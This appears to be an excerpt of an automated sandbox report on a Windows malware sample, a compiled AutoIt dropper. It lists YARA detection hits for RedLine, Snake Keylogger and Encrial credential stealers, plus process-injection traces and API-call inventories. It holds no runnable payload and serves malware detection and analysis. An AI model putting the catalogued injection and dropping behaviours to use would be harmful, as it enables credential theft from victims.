                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F6CABC
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0061CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0061CABC

                System Summary

                Source: 5.2.ghauts.exe.3dd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.2.ghauts.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: This is a third-party compiled AutoIt script.0_2_00EE3B3A
                Source: 3i1gMM8K4z.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 3i1gMM8K4z.exe, 00000000.00000003.1728649989.00000000037F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_67eb08b2-5
                Source: 3i1gMM8K4z.exe, 00000000.00000003.1728649989.00000000037F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b49f3153-9
                Source: 3i1gMM8K4z.exe, 00000000.00000000.1697676318.0000000000F94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b76cf2a9-3
                Source: 3i1gMM8K4z.exe, 00000000.00000000.1697676318.0000000000F94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5889ef36-8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: This is a third-party compiled AutoIt script.1_2_00593B3A
                Source: ghauts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ghauts.exe, 00000001.00000002.1769654807.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_33a15379-a
                Source: ghauts.exe, 00000001.00000002.1769654807.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9f401820-f
                Source: ghauts.exe, 00000005.00000002.1923948210.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2aa9e3c3-7
                Source: ghauts.exe, 00000005.00000002.1923948210.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9b12784a-7
                Source: 3i1gMM8K4z.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3f0db6fc-b
                Source: 3i1gMM8K4z.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_fb644265-4
                Source: ghauts.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0ff8d753-b
                Source: ghauts.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_968f3c5b-0
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00F4A1EF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F38310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F38310
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F451BD
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005F51BD
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEE6A00_2_00EEE6A0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0D9750_2_00F0D975
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEFCE00_2_00EEFCE0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F021C50_2_00F021C5
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F162D20_2_00F162D2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F603DA0_2_00F603DA
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F1242E0_2_00F1242E
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F025FA0_2_00F025FA
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF66E10_2_00EF66E1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F3E6160_2_00F3E616
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F1878F0_2_00F1878F
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F488890_2_00F48889
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F608570_2_00F60857
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F168440_2_00F16844
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF88080_2_00EF8808
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0CB210_2_00F0CB21
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F16DB60_2_00F16DB6
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF6F9E0_2_00EF6F9E
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF30300_2_00EF3030
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0F1D90_2_00F0F1D9
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F031870_2_00F03187
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE12870_2_00EE1287
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F014840_2_00F01484
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF55200_2_00EF5520
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F076960_2_00F07696
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF57600_2_00EF5760
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F019780_2_00F01978
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F19AB50_2_00F19AB5
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F67DDB0_2_00F67DDB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0BDA60_2_00F0BDA6
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F01D900_2_00F01D90
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF3FE00_2_00EF3FE0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEDF000_2_00EEDF00
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_014429D80_2_014429D8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059E6A01_2_0059E6A0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BD9751_2_005BD975
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059FCE01_2_0059FCE0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B21C51_2_005B21C5
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C62D21_2_005C62D2
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_006103DA1_2_006103DA
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C242E1_2_005C242E
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B25FA1_2_005B25FA
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005EE6161_2_005EE616
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A66E11_2_005A66E1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C878F1_2_005C878F
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C68441_2_005C6844
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_006108571_2_00610857
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A88081_2_005A8808
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F88891_2_005F8889
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BCB211_2_005BCB21
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C6DB61_2_005C6DB6
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A6F9E1_2_005A6F9E
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A30301_2_005A3030
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BF1D91_2_005BF1D9
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B31871_2_005B3187
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005912871_2_00591287
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B14841_2_005B1484
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A55201_2_005A5520
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B76961_2_005B7696
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A57601_2_005A5760
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B19781_2_005B1978
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C9AB51_2_005C9AB5
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00617DDB1_2_00617DDB
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B1D901_2_005B1D90
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BBDA61_2_005BBDA6
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059DF001_2_0059DF00
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A3FE01_2_005A3FE0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_01058C381_2_01058C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF12B32_2_02BF12B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF12C02_2_02BF12C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF15602_2_02BF1560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF15502_2_02BF1550
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 5_2_01B883E05_2_01B883E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004016508_2_00401650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012115608_2_01211560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012115508_2_01211550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012112C08_2_012112C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B5E08_2_0566B5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566C43F8_2_0566C43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566C1608_2_0566C160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056641E38_2_056641E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566F0388_2_0566F038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B3008_2_0566B300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056693188_2_05669318
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566BE7F8_2_0566BE7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05665E588_2_05665E58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566AE588_2_0566AE58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056658208_2_05665820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B8C08_2_0566B8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566D8908_2_0566D890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566BBA28_2_0566BBA2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566E5488_2_0566E548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566E5588_2_0566E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B0228_2_0566B022
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566FC898_2_0566FC89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566D8818_2_0566D881
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00F00AE3 appears 70 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00EE7DE1 appears 35 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00F08900 appears 42 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 005B0AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 005B8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 00597DE1 appears 36 times
                Source: 3i1gMM8K4z.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 5.2.ghauts.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.2.ghauts.exe.730000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
